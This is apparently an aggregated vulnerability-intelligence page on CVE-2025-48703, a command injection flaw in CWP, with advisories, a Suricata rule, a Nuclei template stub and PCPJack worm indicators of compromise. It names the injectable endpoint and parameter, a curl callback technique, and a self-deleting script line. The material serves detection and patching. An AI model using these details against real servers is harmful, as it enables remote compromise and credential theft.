CVE-2025-48703
published 2025-09-19CVE-2025-48703: CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total…
PriorityP199critical9CVSS 3.1
AVNACHPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-11-25
Exploited in the wild
EPSS
99.59%
99.9th percentile
CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| centos-webpanel | centos_web_panel | < 0.9.8.1205 | 0.9.8.1205 |
| control-webpanel | webpanel | < 0.9.8.1205 | 0.9.8.1205 |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /{{username}}/index.php?module=filemanager&acc=changePerm
path/login/index.php
otherServer: cwpsrv
commandcurl {{interactsh-url}}
- →Exploit targets the `t_total` parameter in a multipart POST to `/<username>/index.php?module=filemanager&acc=changePerm`. Inject shell metacharacters (e.g., a curl OOB callback) in `t_total` to achieve RCE as the specified user.
- →Fingerprint CWP instances via the HTTP response header `Server: cwpsrv` and confirm via body strings `Control WebPanel` and `cwp` on the login page before exploitation.
- →PCPJack drops its orchestrator to disk as `monitor.py` under `/var/lib/.spm/` and installs a `sys-monitor.service` systemd unit for persistence. Detect unexpected systemd services with this name. ↗
- →PCPJack stores its working files under the hidden directory `/var/lib/.spm/`. Presence of this directory or files `monitor.py`, `utils.py`, `_lat.py`, `_cu.py`, `_cr.py`, `_csc.py` within it is a strong indicator of compromise. ↗
- →Sliver C2 binaries are dropped to `/var/tmp/apt-daily-upgrade` (x86_64), alongside `update-386.bin` and `update-arm.bin` variants. Monitor for ELF binaries in `/var/tmp/` with these names. ↗
- →Exfiltration traffic is sent to Telegram C2 channels. Credentials are encrypted with X25519 ECDH + ChaCha20-Poly1305, split into 2800-byte chunks, and each chunk is prepended with a 🔒 emoji. Monitor for outbound Telegram API traffic from server-class hosts. ↗
- →The attacker-controlled X25519 recipient public key embedded in `crypto_util.py` is `6d4imqQ/s/GfQCVcybdcjfTe/PMYHtZN8ZGHnEXSbRo=`. Presence of this string in any file on disk is a high-confidence IOC. ↗
- →Check Point IPS signature name for this CVE is `CentOS Web Panel Command Injection (CVE-2025-48703)`. Use this signature name when querying IPS/SIEM logs. ↗
- →The worm harvests credentials from `harvest.jsonl` on disk. Presence of this file in unexpected locations (e.g., home directories, /tmp) indicates active credential harvesting by PCPJack. ↗
- →The second-stage credential harvester (`check.sh`) reads `/proc/*/environ` to extract secrets from running process environments. Monitor for scripts or processes accessing `/proc/*/environ` at scale. ↗
- ·Exploitation requires prior knowledge of a valid non-root username on the target CWP instance. Unauthenticated RCE is not possible without this prerequisite. ↗
- ·The Nuclei template is marked `verified: false` and uses out-of-band (OOB/interactsh) DNS callback for confirmation. False positives are possible if DNS interaction is not observed; HTTP response alone is insufficient for confirmation.
- ·If the `cryptography` Python library is absent on the victim host, PCPJack silently falls back to sending credentials in plaintext to the C2, meaning exfiltrated data may not be encrypted in all infections. ↗
- ·The bootstrap script deletes itself after execution (`rm -f "$0"`), removing forensic evidence of the initial infection vector from disk. ↗
CVSS provenance
nvdv3.19.0CRITICALCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck9.0CRITICAL
cisa9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vx2w-cj7g-8hcf: CWP (aka Control Web Panel or CentOS Web Panel) before 0
ghsa_unreviewed·2025-09-22
CVE-2025-48703 [CRITICAL] CWE-78 GHSA-vx2w-cj7g-8hcf: CWP (aka Control Web Panel or CentOS Web Panel) before 0
CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
VulnCheck
CWP Control Web Panel OS Command Injection Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Affected: CWP Control Web Panel
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-15&host_type=src&vulnerability=cve-2025-48703; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https:
CISA
CWP Control Web Panel OS Command Injection Vulnerability
cisa·2025-11-04·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
Vulnerability: CWP Control Web Panel OS Command Injection Vulnerability
Affected: CWP Control Web Panel
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command Injection vulnerability that allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://control-webpanel.com/changelog ; https://nvd.nist.gov/vuln/detail/CVE-2025-48703
Remediation Due Date: 2025-11-25
Suricata
ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
suricata·2025-06-25·CVSS 9.0
CVE-2025-48703 [CRITICAL] ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)
Rule: alert http any any -> $HOME_NET 2083 (msg:"ET WEB_SPECIFIC_APPS CentOS Web Panel Unauthenticated Remote Command Execution (CVE-2025-48703)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"module|3d|filemanager"; fast_pattern; content:"acc|3d|changePerm"; http.request_body; content:"t_total"; pcre:"/^.{1,10}(?:[\x3b\x24\x27\x60\x7c]|\x25(?:3[bB]|2[47]|60|7[cC]))/R"; reference:url,fenrisk.com/rce-centos-webpanel; reference:cve,2025-48703; classtype:web-application-attack; sid:2063180; rev:1; metadata:attack_target Server, created_at 2025_06_25, cve CVE_2025_48703, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit,
Nuclei
CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
nuclei·CVSS 9.0
CVE-2025-48703 [CRITICAL] CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
Template:
id: CVE-2025-48703
info:
name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
impact: |
Unauthenticated at
Sans Isc
TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)
blogs_sans_isc·2026-05-18
CVE-2026-45321 TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)
TeamPCP Supply Chain Campaign: Activity Through 2026-05-17
Published: 2026-05-18. Last Updated: 2026-05-18 20:08:00 UTC
by Kenneth Hartman (Version: 1)
0 comment(s)
Since the last update, the TeamPCP supply chain campaign produced its loudest stretch since the March Trivy disclosure: an officially confirmed Checkmarx Jenkins plugin compromise and a new self-spreading Mini Shai-Hulud worm across npm and PyPI.
Bottom line up front
Two TeamPCP events broke within 48 hours of each other and doubled attention on the campaign. Checkmarx confirmed its Jenkins AST plugin was trojanized, its third compromise in three months, validating an earlier single-researcher claim. In parallel, a new Mini Shai-Hulud worm poisoned roughly 170 npm and PyPI packages (42 @tanstack packages in about six minut
Bleepingcomputer
New PCPJack worm steals credentials, cleans TeamPCP infections
blogs_bleepingcomputer·2026-05-07·CVSS 9.1
CVE-2025-29927 [CRITICAL] New PCPJack worm steals credentials, cleans TeamPCP infections
## New PCPJack worm steals credentials, cleans TeamPCP infections
## Bill Toulas
PCPJack’s capabilities revolve mainly around credential theft, targeting cloud environments, developer systems, messenger apps, financial services, databases, SSH keys, Slack tokens, WordPress configs, OpenAI keys, Anthropic keys, Discord, DigitalOcean, and more.
The credentials are exfiltrated to Telegram channels after they are encrypted using X25519 ECDH and ChaCha20-Poly1305, and split into 2800-byte chunks respecting Telegram’s message character limits.
PCPJack propagates by scanning external cloud infrastructure for exposed services such as Docker, Kubernetes, Redis, MongoDB, and RayML, then attempts exploiting known vulnerabilities to gain access.
It also downloads hostname data from Common Crawl p
Sentinelone
PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
blogs_sentinelone·2026-05-07
CVE-2025-29927 PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
## PCPJack | Cloud Worm Evicts TeamPCP and Steals Credentials at Scale
## Executive Summary
SentinelLABS has identified PCPJack, a credential theft framework that worms across exposed cloud infrastructure and removes artifacts associated with TeamPCP, a threat actor persona who claimed several high-profile supply chain intrusions throughout early 2026.
The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts.
PCPJack targets exposed services including Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications, enabling both external propagation and lateral movement inside victim environments.
Unlike typical
Hackernews
PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
blogs_hackernews·2026-05-07
CVE-2025-55182 PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments.
"The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts," SentinelOne security researcher Alex Delamotte said in a report published today.
PCPJack is specifically designed to
Checkpoint
10th November – Threat Intelligence Report
blogs_checkpoint·2025-11-10
CVE-2024-38197 10th November – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 10th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th November, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
The US Congressional Budget Office (CBO) has confirmed a cyber attack that resulted in a suspected foreign threat actor breaching its network and potentially exposing sensitive communications between congressional offices and CBO analysts. The incident may have led to the compromise of draft reports, economic forecasts,
Greynoiseio
NoiseLetter August 2025
blogs_greynoiseio
NoiseLetter August 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
blogs_recorded_future·CVSS 5.4
CVE-2025-64446 [MEDIUM] November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
# November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October
November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 10 vulnerabilities requiring immediate attention, down from 32 in October.
What security teams need to know:
- Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
- LANDFALL spyware campaign: Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks
- Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
- OS Command Injection and Out-of-bounds Write were tied as the most common weakness types
Bottom line: Th
2025-09-19
Published
2025-11-04
Added to CISA KEV
Exploited in the wild